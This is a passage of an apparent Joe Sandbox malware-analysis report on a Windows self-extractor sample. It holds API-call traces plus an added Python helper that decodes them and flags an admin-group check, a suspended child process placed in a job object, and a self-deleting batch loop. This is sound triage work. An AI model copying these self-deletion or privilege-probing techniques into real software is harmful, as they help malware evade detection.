                                                                      • API String ID: 3007203151-3467708659
                                                                      • Opcode ID: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                                      • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                      • Opcode Fuzzy Hash: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                                      • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
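The three call records above are the most telling ones in this stretch of the report: the AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple (sub-authority count 2, RIDs 0x20 and 0x220), the CreateProcessW launcher tagged with the "sfxwaitall" string that parks the child in a job object before ResumeThread, and the CreateFileW / WriteFile / ShellExecuteW routine whose strings ("7ZSfx%03x.cmd", ":Repeat", "del \"", "if exist \"", "goto Repeat") spell out a batch file that loops until it has deleted its target. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses the report's "Api.MODULE(args), ref: addr" call lines, turns the hexadecimal arguments into integers, decodes the CreateProcessW creation flags, the SID sub-authorities and the SetInformationJobObject information class, and reports the three behaviours. The input is constructed from the lines on this page; the constant names are the Windows SDK ones; the identifier-authority pointer handed to AllocateAndInitializeSid is not resolved in the trace, so the BUILTIN\Administrators label is an inference from the RID pair 32/544 alone.

```python
"""Added triage helper: decode Joe Sandbox IDA-plugin API-call records."""
import re
from dataclasses import dataclass

# Constructed input: call lines copied from three records on this page
# (the SID/token check, the "sfxwaitall" launcher, the batch self-deleter).
SAMPLE = """\
• AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
• FreeSid.ADVAPI32(?), ref: 004024A2
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
• CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
• AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
• SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
• WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
"""

# Matches "Api.MODULE(arg,arg,...), ref: ADDR" and "Api.MODULE ref: ADDR".
# "Part of subcall function ..." lines belong to a callee and do not match.
CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>[^.(\s]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# CreateProcessW dwCreationFlags bits (WinBase.h).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x08000000: "CREATE_NO_WINDOW",
}
# Well-known BUILTIN aliases keyed by (SECURITY_BUILTIN_DOMAIN_RID, alias RID).
# Assumption: the identifier authority (passed by pointer, not visible in the
# trace) is SECURITY_NT_AUTHORITY, i.e. the SID is S-1-5-32-<alias>.
BUILTIN_ALIASES = {(32, 544): "BUILTIN\\Administrators",
                   (32, 545): "BUILTIN\\Users",
                   (32, 555): "BUILTIN\\Remote Desktop Users"}
JOB_OBJECT_ASSOCIATE_COMPLETION_PORT = 7  # JOBOBJECTINFOCLASS value


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for 8-digit hex literals, None for "?", str otherwise
    ref: int     # address of the call site


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_calls(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16)))
    return calls


def decode_creation_flags(value: int) -> list:
    return [name for bit, name in CREATION_FLAGS.items() if value & bit]


def triage(calls: list) -> list:
    """Return findings for the call sequence, in record order."""
    findings = []
    apis = [c.api for c in calls]
    for i, c in enumerate(calls):
        later = apis[i:]
        if c.api == "AllocateAndInitializeSid" and len(c.args) > 3 and c.args[1] == 2:
            alias = BUILTIN_ALIASES.get((c.args[2], c.args[3]), "unknown alias")
            if "CheckTokenMembership" in later:
                findings.append(f"group-membership check against {alias} "
                                f"(RIDs {c.args[2]}-{c.args[3]})")
        elif c.api == "CreateProcessW" and len(c.args) > 5 and isinstance(c.args[5], int):
            flags = decode_creation_flags(c.args[5])
            job = all(a in later for a in
                      ("CreateJobObjectW", "AssignProcessToJobObject", "ResumeThread"))
            if "CREATE_SUSPENDED" in flags and job:
                findings.append("child started suspended and placed in a job "
                                "object before resume: " + "|".join(flags))
        elif c.api == "SetInformationJobObject" and len(c.args) > 1 \
                and c.args[1] == JOB_OBJECT_ASSOCIATE_COMPLETION_PORT:
            findings.append("job object bound to an I/O completion port "
                            "(wait-for-all-children)")
        elif c.api == "WriteFile" and any(isinstance(a, str) and a in ('del "', ":Repeat")
                                          for a in c.args):
            if "ShellExecuteW" in later:
                findings.append("batch file with a del/goto loop written and "
                                "launched (self-deletion)")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_calls(SAMPLE)):
        print(finding)
```

Run against the constructed lines it reports four findings: the RID pair 32/544 with a following CheckTokenMembership (an "am I in Administrators" probe), CreateProcessW flags 0x01000004 decoded as CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB followed by the job-object calls, information class 7 (JobObjectAssociateCompletionPortInformation, the reason the routine can then sit in GetQueuedCompletionStatus until the job reports no active processes), and the batch-file self-deleter. Lines starting with "Part of subcall function" are deliberately ignored so that callee activity is not attributed to the caller.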
                                                                      APIs
                                                                      • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • _wtol.MSVCRT ref: 00404CDF
                                                                      • _wtol.MSVCRT ref: 00404CFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                      • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$_
                                                                      • API String ID: 2725485552-3483632650
                                                                      • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                      • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                      • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                      • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                      APIs
                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                      • GetParent.USER32(?), ref: 0040319B
                                                                      • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                      • GetMenu.USER32(?), ref: 004031C2
                                                                      • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                      • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                      • DestroyWindow.USER32(?), ref: 00403210
                                                                      • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                      • GetSysColor.USER32(0000000F), ref: 00403229
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                      • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                      • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                      • API String ID: 3514532227-2281146334
                                                                      • Opcode ID: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                                      • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                      • Opcode Fuzzy Hash: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                                      • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • LoadIconW.USER32(00000000), ref: 00408717
                                                                      • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                      • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                      • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                      • LoadIconW.USER32(00000000), ref: 0040895E
                                                                      • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                      • SendMessageW.USER32(00000000), ref: 00408980
                                                                        • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                        • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                      • String ID:
                                                                      • API String ID: 3694754696-0
                                                                      • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                      • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                      • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                      • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                      APIs
                                                                      • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                      • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                      • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                      • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                      • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                      • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                      • String ID:
                                                                      • API String ID: 3462224810-0
                                                                      • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                      • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                      • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                      • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                      APIs
                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                      • GetMenu.USER32(?), ref: 0040202E
                                                                        • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                        • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                        • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                        • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                      • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                      • CoInitialize.OLE32(00000000), ref: 00402076
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                        • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                        • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                        • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                        • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                        • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                        • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                        • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                        • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                      • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                      • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                      • String ID: IMAGES$STATIC
                                                                      • API String ID: 4202116410-1168396491
                                                                      • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                      • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                      • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                      • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                      APIs
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                      • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                      • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                      • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                      • SetFocus.USER32(00000000), ref: 00408C16
                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                      • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                      • IsWindow.USER32(00000000), ref: 00408C89
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                      • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                      • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                        • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                      • String ID:
                                                                      • API String ID: 1057135554-0
                                                                      • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                      • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                      • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                      • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                      • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                      • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                      • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                      • GetParent.USER32(?), ref: 00407418
                                                                      • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                      • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                      • GetClientRect.USER32(?,?), ref: 0040753D
                                                                        • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                        • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
